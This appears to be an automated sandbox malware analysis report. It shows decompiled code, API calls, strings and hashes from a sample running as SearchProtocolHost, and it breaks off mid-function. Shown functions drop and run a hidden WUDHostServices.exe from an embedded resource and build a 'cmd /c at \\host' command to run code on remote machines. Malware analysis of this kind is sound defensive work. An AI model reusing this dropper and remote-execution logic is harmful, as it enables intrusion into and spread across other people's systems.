                                                0x00000000
                                                0x00000000
                                                0x02fb22f7
                                                0x02fb22d0
                                                0x02fb22c4
                                                0x02fb22a5
                                                0x02fb2296
                                                0x02fb226d
                                                0x02fb2263

                                                APIs
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 02FB2320
                                                • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 02FB239B
                                                • ___TypeMatch.LIBVCRUNTIME ref: 02FB2419
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 02FB249B
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 02FB24CC
                                                • FindHandlerForForeignException.LIBVCRUNTIME ref: 02FB251B
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 02FB253D
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02FB2555
                                                • _UnwindNestedFrames.LIBCMT ref: 02FB255D
                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 02FB2569
                                                • CallUnexpected.LIBVCRUNTIME ref: 02FB2574
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Exception$DestructObjectSpecUnwind$CallCheckException@8FindForeignFrameFramesHandlerMatchNestedRangeStateThrowTrysTypeUnexpected
                                                • String ID: csm$csm$csm
                                                • API String ID: 410073093-393685449
                                                • Opcode ID: e6daf98fd5e0c1eecae80cfe8969c7d8b7a120ae926c4258f0e6e5711629dfb8
                                                • Instruction ID: f18f4350bf1c534138951ea7fb6e8afe739e0f21164cef348c5b3f5f4d2997f0
                                                • Opcode Fuzzy Hash: e6daf98fd5e0c1eecae80cfe8969c7d8b7a120ae926c4258f0e6e5711629dfb8
                                                • Instruction Fuzzy Hash: 78B19E71C00609DFDF26DFA6C890BEEBBB6BF08394F044159EA1166651C731EA41CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA9740 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 112filesynchronizationCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E02FA9740(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				intOrPtr _v792;
				intOrPtr _v796;
				void* __esi;
				signed int _t22;
				void* _t51;
				struct HRSRC__* _t57;
				void* _t70;
				long _t71;
				void** _t72;
				signed int _t73;

				_t68 = __edi;
				_t58 = __ecx;
				_t22 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t22 ^ _t73;
				_v792 = __edx;
				_v796 = __ecx;
				E02FB3440(__edi,  &_v788, 0, 0x104);
				E02FB3440(_t68,  &_v528, 0, 0x104);
				E02FB3440(_t68,  &_v268, 0, 0x104);
				GetSystemDirectoryA( &_v788, 0x104);
				E02FA3F90(_t58,  &_v528, "%s\\mkz.output",  &_v788);
				E02FA3F90(_t58,  &_v268, "%s\\WUDHostServices.exe",  &_v788);
				DeleteFileA( &_v528);
				DeleteFileA( &_v268);
				_t57 = FindResourceA(0, 0x65, "BIN");
				if(_t57 == 0) {
					L7:
					DeleteFileA( &_v268);
					DeleteFileA( &_v528);
					return E02FB0A5D(_v8 ^ _t73, _t70);
				}
				_push(_t70);
				_t71 = SizeofResource(0, _t57);
				if(LockResource(LoadResource(0, _t57)) != 0 && _t71 != 0) {
					_t51 = E02FA4E00( &_v268, _t50, _t71);
					_t83 = _t51;
					if(_t51 != 0) {
						_t72 = E02FA4F50( &_v268, 0, _t83, 0);
						if(_t72 != 0) {
							WaitForSingleObject( *_t72, 0x7530);
							_push(0x10);
							E02FB0AA1(_t72);
							E02FA94A0(_t57,  &_v528, _v796, DeleteFileA, _v792);
						}
					}
				}
				_pop(_t70);
				goto L7;
			}

















                                                0x02fa9740
                                                0x02fa9740
                                                0x02fa9749
                                                0x02fa9750
                                                0x02fa9760
                                                0x02fa9769
                                                0x02fa976f
                                                0x02fa9782
                                                0x02fa9795
                                                0x02fa97a9
                                                0x02fa97c2
                                                0x02fa97da
                                                0x02fa97ef
                                                0x02fa97f8
                                                0x02fa9809
                                                0x02fa980d
                                                0x02fa9894
                                                0x02fa989b
                                                0x02fa98a4
                                                0x02fa98b5
                                                0x02fa98b5
                                                0x02fa9813
                                                0x02fa9820
                                                0x02fa9831
                                                0x02fa9840
                                                0x02fa9848
                                                0x02fa984a
                                                0x02fa985b
                                                0x02fa9862
                                                0x02fa986b
                                                0x02fa9871
                                                0x02fa9874
                                                0x02fa988b
                                                0x02fa9890
                                                0x02fa9862
                                                0x02fa984a
                                                0x02fa9893
                                                0x00000000

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32 ref: 02FA97A9
                                                • DeleteFileA.KERNEL32(?), ref: 02FA97EF
                                                • DeleteFileA.KERNEL32(?), ref: 02FA97F8
                                                • FindResourceA.KERNEL32(00000000,00000065,BIN), ref: 02FA9803
                                                • SizeofResource.KERNEL32(00000000,00000000,77109EB0), ref: 02FA9817
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 02FA9822
                                                • LockResource.KERNEL32(00000000), ref: 02FA9829
                                                  • Part of subcall function 02FA4E00: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,73BCF7E0,00000000,?,?,02FA9845), ref: 02FA4E22
                                                  • Part of subcall function 02FA4E00: WriteFile.KERNEL32(00000000,00000000,02FA9845,00000000,00000000,?,02FA9845), ref: 02FA4E39
                                                  • Part of subcall function 02FA4E00: CloseHandle.KERNEL32(00000000,?,02FA9845), ref: 02FA4E44
                                                  • Part of subcall function 02FA4F50: new.LIBCMT ref: 02FA4F6C
                                                  • Part of subcall function 02FA4F50: GetStartupInfoA.KERNEL32(?), ref: 02FA4F8D
                                                  • Part of subcall function 02FA4F50: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,02FA985B,00000044,00000000,?,?,?,?,73BCF7E0,00000000), ref: 02FA4FBB
                                                • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 02FA986B
                                                • DeleteFileA.KERNEL32(?), ref: 02FA989B
                                                • DeleteFileA.KERNEL32(?), ref: 02FA98A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$DeleteResource$Create$CloseDirectoryFindHandleInfoLoadLockObjectProcessSingleSizeofStartupSystemWaitWrite
                                                • String ID: %s\WUDHostServices.exe$%s\mkz.output$BIN
                                                • API String ID: 3567760449-3573885109
                                                • Opcode ID: 9614184252264b993827e2b94248654e728da1b61ff625f4df89fa05d3a8e803
                                                • Instruction ID: eeaf2629cfa251f11f0280732bb116724f400bb50de8f429012386f4842eed51
                                                • Opcode Fuzzy Hash: 9614184252264b993827e2b94248654e728da1b61ff625f4df89fa05d3a8e803
                                                • Instruction Fuzzy Hash: C43185B5D8031CABDB21EBA0DD49FDAB36DAF04744F5005F5A609E7180DEB0AB948F90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAA760 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 148timeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 79%
                                                			E02FAA760(void* __ebx, WCHAR* __ecx, void* __edx, void* __edi, struct _SYSTEMTIME _a16, signed short _a24, signed short _a26, short _a30, short _a32, char _a40, char _a80, short _a608, char _a616, char _a624, short _a1120, char _a1128, char _a1664, short _a3712, char _a3720, signed int _a5740, signed int _a5772) {
				void* __esi;
				signed int _t33;
				signed char _t35;
				void* _t48;
				void* _t54;
				void* _t77;
				WCHAR* _t97;
				void* _t101;
				void* _t103;
				signed int _t104;
				signed int _t105;

				_t105 = _t104 & 0xfffffff8;
				E02FC3CA0();
				_t33 =  *0x2fcf008; // 0x93ad1eea
				_a5740 = _t33 ^ _t105;
				_push(__ebx);
				_push(__edi);
				_t97 = __ecx;
				_t77 = __edx;
				_t35 = GetFileAttributesW(__ecx);
				if(_t35 == 0xffffffff || (_t35 & 0x00000010) == 0) {
					L7:
					_pop(_t101);
					return E02FB0A5D(_a5740 ^ _t105, _t101);
				} else {
					E02FB3440(_t97,  &_a80, 0, 0x208);
					_t105 = _t105 + 0xc;
					E02FAA210(_t97,  &_a80);
					if(E02FAA3B0(_t77,  &_a80,  &_a80, _t97) == 0) {
						goto L7;
					} else {
						E02FB3440(_t97,  &_a1120, 0, 0x208);
						wsprintfW( &_a1120, L"%ws\\%ws",  &_a80, L"Microsoft.ini");
						_t48 = E02FAA630("CONFIGURATION", 0xd,  &_a1128);
						_t105 = _t105 + 0x20;
						if(_t48 == 0) {
							goto L7;
						} else {
							E02FB3440(_t97,  &_a608, 0, 0x208);
							wsprintfW( &_a608, L"%ws\\%ws", _t97, 0x2fd6838);
							_t54 = E02FAA630( *0x2fd6a44,  *0x2fd6a40,  &_a616);
							_t105 = _t105 + 0x20;
							if(_t54 == 0) {
								goto L7;
							} else {
								asm("xorps xmm0, xmm0");
								_a16.wYear = 0;
								_a26 = 0;
								_a30 = 0;
								asm("movq [esp+0x16], xmm0");
								GetLocalTime( &_a16);
								E02FB3440(_t97,  &_a32, 0, 0x40);
								wsprintfW( &_a32, L"%02d:%02d", _a24 & 0x0000ffff, (_a26 & 0x0000ffff) + 3);
								E02FB3440(_t97,  &_a1664, 0, 0x800);
								_t105 = _t105 + 0x28;
								if(E02FAA6C0( &_a624,  &_a1664) == 0) {
									goto L7;
								} else {
									E02FB3440(_t97,  &_a3712, 0, 0x800);
									wsprintfW( &_a3712, L"cmd /c at \\\\%ws %ws \"%ws\"", _t77,  &_a40,  &_a1664);
									E02FAA330( &_a3720);
									_pop(_t103);
									return E02FB0A5D(_a5772 ^ _t105 + 0x20, _t103);
								}
							}
						}
					}
				}
			}














                                                0x02faa763
                                                0x02faa76b
                                                0x02faa770
                                                0x02faa777
                                                0x02faa77e
                                                0x02faa780
                                                0x02faa781
                                                0x02faa783
                                                0x02faa786
                                                0x02faa78f
                                                0x02faa950
                                                0x02faa95a
                                                0x02faa966
                                                0x02faa79d
                                                0x02faa7a9
                                                0x02faa7ae
                                                0x02faa7b7
                                                0x02faa7c7
                                                0x00000000
                                                0x02faa7cd
                                                0x02faa7dc
                                                0x02faa801
                                                0x02faa815
                                                0x02faa81a
                                                0x02faa81f
                                                0x00000000
                                                0x02faa825
                                                0x02faa834
                                                0x02faa84f
                                                0x02faa865
                                                0x02faa86a
                                                0x02faa86f
                                                0x00000000
                                                0x02faa875
                                                0x02faa877
                                                0x02faa87a
                                                0x02faa87f
                                                0x02faa883
                                                0x02faa88d
                                                0x02faa893
                                                0x02faa8a2
                                                0x02faa8c3
                                                0x02faa8d4
                                                0x02faa8d9
                                                0x02faa8f1
                                                0x00000000
                                                0x02faa8f3
                                                0x02faa902
                                                0x02faa925
                                                0x02faa931
                                                0x02faa93c
                                                0x02faa94f
                                                0x02faa94f
                                                0x02faa8f1
                                                0x02faa86f
                                                0x02faa81f
                                                0x02faa7c7

                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,?,02FD5480,02FD5480,?,02FAAA18), ref: 02FAA786
                                                  • Part of subcall function 02FAA3B0: wsprintfW.USER32 ref: 02FAA3F6
                                                  • Part of subcall function 02FAA3B0: wsprintfW.USER32 ref: 02FAA421
                                                  • Part of subcall function 02FAA3B0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02FAA442
                                                  • Part of subcall function 02FAA3B0: CloseHandle.KERNEL32(00000000), ref: 02FAA454
                                                  • Part of subcall function 02FAA3B0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000002,00000080,00000000), ref: 02FAA4E7
                                                  • Part of subcall function 02FAA3B0: GetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 02FAA50A
                                                  • Part of subcall function 02FAA3B0: CloseHandle.KERNEL32(00000000), ref: 02FAA515
                                                • wsprintfW.USER32 ref: 02FAA801
                                                  • Part of subcall function 02FAA630: CreateFileW.KERNEL32(02FAA81A,C0000000,00000000,00000000,00000002,00000000,00000000,?,745EC0B0,?,CONFIGURATION,?,02FAA81A,?), ref: 02FAA655
                                                • wsprintfW.USER32 ref: 02FAA84F
                                                  • Part of subcall function 02FAA630: WriteFile.KERNEL32(00000000,CONFIGURATION,0000000D,?,00000000,?,745EC0B0,?,CONFIGURATION,?,02FAA81A), ref: 02FAA67B
                                                  • Part of subcall function 02FAA630: CloseHandle.KERNEL32(00000000,?,745EC0B0,?,CONFIGURATION,?,02FAA81A), ref: 02FAA687
                                                • GetLocalTime.KERNEL32(?), ref: 02FAA893
                                                • wsprintfW.USER32 ref: 02FAA8C3
                                                • wsprintfW.USER32 ref: 02FAA925
                                                  • Part of subcall function 02FAA330: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,?,745EC0B0), ref: 02FAA384
                                                  • Part of subcall function 02FAA330: WaitForSingleObject.KERNEL32(?,00000000,?,745EC0B0), ref: 02FAA393
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Filewsprintf$Create$CloseHandle$Time$AttributesLocalObjectProcessSingleWaitWrite
                                                • String ID: %02d:%02d$%ws\%ws$CONFIGURATION$Microsoft.ini$cmd /c at \\%ws %ws "%ws"
                                                • API String ID: 596974635-589520791
                                                • Opcode ID: 137a9642bf917f661877781c2ed36ef805bf9edcf214b4cb90420a751c4b4988
                                                • Instruction ID: 6f355b65de2ba14cdc6e823d458cfdd598539bbec868796c7c7e4d9886097e8f
                                                • Opcode Fuzzy Hash: 137a9642bf917f661877781c2ed36ef805bf9edcf214b4cb90420a751c4b4988
                                                • Instruction Fuzzy Hash: AF41F7B29483455BD660EB64DD45FDBB3EDAF88744F00092AF788D3180EB71A518CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FBFB76 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 41%
                                                			E02FBFB76(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = E02FBF8D9(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E02FBBF6B(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = E02FBF844();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E02FBBEB4(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x2fd6480 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = E02FBF5F7(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x2fd6480 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = E02FBF844();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x2fd6480 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											E02FB5D0D(GetLastError());
											 *( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E02FBC07D( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E02FBFA55(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E02FBA32C(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							E02FB5D0D(_t270);
							 *( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(E02FB5D43())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x2fd6480 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E02FB5D0D(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = E02FBF844();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E02FB5D30()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(E02FB5D43())) = 0x18;
						goto L2;
					}
				} else {
					 *(E02FB5D30()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(E02FB5D43()));
				}
			}





















































                                                0x02fbfb99
                                                0x02fbfb9d
                                                0x02fbfb9e
                                                0x02fbfb9e
                                                0x02fbfb9e
                                                0x02fbfba0
                                                0x02fbfba6
                                                0x02fbfbc1
                                                0x02fbfbc6
                                                0x02fbfbc9
                                                0x02fbfbcb
                                                0x02fbfbcd
                                                0x02fbfbec
                                                0x02fbfbf3
                                                0x02fbfbfa
                                                0x02fbfbfd
                                                0x02fbfc09
                                                0x02fbfc0c
                                                0x02fbfc14
                                                0x02fbfc15
                                                0x02fbfc18
                                                0x02fbfc18
                                                0x02fbfc1f
                                                0x02fbfc21
                                                0x02fbfc24
                                                0x02fbfc2c
                                                0x02fbfc2f
                                                0x02fbfc9c
                                                0x02fbfc9d
                                                0x02fbfca3
                                                0x02fbfca5
                                                0x02fbfcee
                                                0x02fbfcf1
                                                0x02fbfcfa
                                                0x02fbfcfd
                                                0x02fbfd00
                                                0x02fbfd02
                                                0x02fbfd02
                                                0x02fbfd02
                                                0x02fbfcf3
                                                0x02fbfcf6
                                                0x02fbfcf6
                                                0x02fbfd07
                                                0x02fbfd0a
                                                0x02fbfd16
                                                0x02fbfd1b
                                                0x02fbfd27
                                                0x02fbfd31
                                                0x02fbfd35
                                                0x02fbfd3f
                                                0x02fbfd42
                                                0x02fbfd4d
                                                0x02fbfd52
                                                0x02fbfd62
                                                0x02fbfd65
                                                0x02fbfd69
                                                0x02fbfd6a
                                                0x02fbfd70
                                                0x02fbfd75
                                                0x02fbfd78
                                                0x02fbfd7a
                                                0x02fbfd7c
                                                0x02fbfd81
                                                0x02fbfd84
                                                0x02fbfd86
                                                0x02fbfdb0
                                                0x02fbfdd4
                                                0x02fbfdd8
                                                0x02fbfddc
                                                0x02fbfdde
                                                0x02fbfde2
                                                0x02fbfde4
                                                0x02fbfdee
                                                0x02fbfdf1
                                                0x02fbfdf8
                                                0x02fbfdf8
                                                0x02fbfdf8
                                                0x02fbfdf8
                                                0x02fbfde2
                                                0x02fbfdfd
                                                0x02fbfe09
                                                0x02fbfe0b
                                                0x02fbfe96
                                                0x02fbfe96
                                                0x00000000
                                                0x02fbfe11
                                                0x02fbfe11
                                                0x02fbfe15
                                                0x00000000
                                                0x00000000
                                                0x02fbfe1a
                                                0x02fbfe2c
                                                0x02fbfe34
                                                0x02fbfe37
                                                0x02fbfe38
                                                0x02fbfe3b
                                                0x02fbfe42
                                                0x02fbfe47
                                                0x02fbfe4a
                                                0x02fbfe7e
                                                0x02fbfe88
                                                0x02fbfe88
                                                0x02fbfe92
                                                0x00000000
                                                0x02fbfe92
                                                0x02fbfe53
                                                0x02fbfe6c
                                                0x02fbfe73
                                                0x02fbfc96
                                                0x00000000
                                                0x02fbfc96
                                                0x02fbfe0b
                                                0x02fbfd88
                                                0x00000000
                                                0x02fbfd54
                                                0x02fbfd5b
                                                0x02fbfd5e
                                                0x02fbfd60
                                                0x02fbfd8a
                                                0x02fbfd8c
                                                0x00000000
                                                0x02fbfd92
                                                0x00000000
                                                0x02fbfd60
                                                0x02fbfd52
                                                0x02fbfcad
                                                0x02fbfcb0
                                                0x02fbfccb
                                                0x02fbfcd0
                                                0x02fbfcd6
                                                0x02fbfcd8
                                                0x02fbfce3
                                                0x02fbfce3
                                                0x00000000
                                                0x02fbfcd8
                                                0x02fbfc31
                                                0x02fbfc38
                                                0x02fbfc3a
                                                0x02fbfc71
                                                0x02fbfc71
                                                0x02fbfc7b
                                                0x02fbfc7e
                                                0x02fbfc85
                                                0x02fbfc85
                                                0x02fbfc85
                                                0x02fbfc91
                                                0x00000000
                                                0x02fbfc91
                                                0x02fbfc3c
                                                0x02fbfc40
                                                0x00000000
                                                0x00000000
                                                0x02fbfc42
                                                0x02fbfc51
                                                0x02fbfc56
                                                0x02fbfc59
                                                0x02fbfc5a
                                                0x02fbfc5d
                                                0x02fbfc5d
                                                0x02fbfc64
                                                0x02fbfc66
                                                0x02fbfc69
                                                0x02fbfc6c
                                                0x02fbfc6f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fbfbcf
                                                0x02fbfbd4
                                                0x02fbfbd7
                                                0x02fbfbde
                                                0x00000000
                                                0x02fbfbde
                                                0x02fbfba8
                                                0x02fbfbad
                                                0x02fbfbb3
                                                0x02fbfbb5
                                                0x00000000
                                                0x02fbfbba

                                                APIs
                                                  • Part of subcall function 02FBF844: CreateFileW.KERNEL32(00000000,00000000,?,02FBFC1F,?,?,00000000,?,02FBFC1F,00000000,0000000C), ref: 02FBF861
                                                • GetLastError.KERNEL32 ref: 02FBFC8A
                                                • __dosmaperr.LIBCMT ref: 02FBFC91
                                                • GetFileType.KERNEL32(00000000), ref: 02FBFC9D
                                                • GetLastError.KERNEL32 ref: 02FBFCA7
                                                • __dosmaperr.LIBCMT ref: 02FBFCB0
                                                • CloseHandle.KERNEL32(00000000), ref: 02FBFCD0
                                                • CloseHandle.KERNEL32(?), ref: 02FBFE1A
                                                • GetLastError.KERNEL32 ref: 02FBFE4C
                                                • __dosmaperr.LIBCMT ref: 02FBFE53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID: H
                                                • API String ID: 4237864984-2852464175
                                                • Opcode ID: 929cc845d033770e21f3f7b816cc635c65f8a13ab71ee331b0648984467757e6
                                                • Instruction ID: e51a9c197c5568f04b4e4f10ce97df00cf840783b903628f083e0f6f8607530d
                                                • Opcode Fuzzy Hash: 929cc845d033770e21f3f7b816cc635c65f8a13ab71ee331b0648984467757e6
                                                • Instruction Fuzzy Hash: 9CA13332E141498FDF1A9F79DC51BEE7BA1AF0A3A4F140249F912EB291C7349912CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA7980 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 193sleepfileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 70%
                                                			E02FA7980(void* __ebx, void* __edi, intOrPtr _a4) {
				long _v8;
				char _v16;
				signed int _v20;
				char _v102420;
				intOrPtr _v102424;
				intOrPtr* _v102428;
				intOrPtr* _v102432;
				struct _CRITICAL_SECTION _v102456;
				long _v102460;
				long _v102464;
				void* _v102468;
				char _v102472;
				void* __esi;
				signed int _t41;
				signed int _t42;
				void* _t46;
				void* _t60;
				void* _t69;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t104;
				void* _t111;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr _t115;
				void* _t116;
				intOrPtr* _t117;
				signed int _t118;
				void* _t119;
				void* _t120;
				void* _t122;

				_push(0xffffffff);
				_push(E02FC463B);
				_push( *[fs:0x0]);
				E02FC3CA0();
				_t41 =  *0x2fcf008; // 0x93ad1eea
				_t42 = _t41 ^ _t118;
				_v20 = _t42;
				_push(_t42);
				 *[fs:0x0] =  &_v16;
				_t115 = _a4;
				_v102424 = _t115;
				if(_t115 == 0) {
					L15:
					 *[fs:0x0] = _v16;
					_pop(_t116);
					return E02FB0A5D(_v20 ^ _t118, _t116);
				}
				_t46 = CreateFileA("C:\\Windows\\system32\\msvcwme.log", 0x80000000, 1, 0, 3, 0, 0);
				_t127 = _t46 - 0xffffffff;
				if(_t46 == 0xffffffff) {
					goto L15;
				}
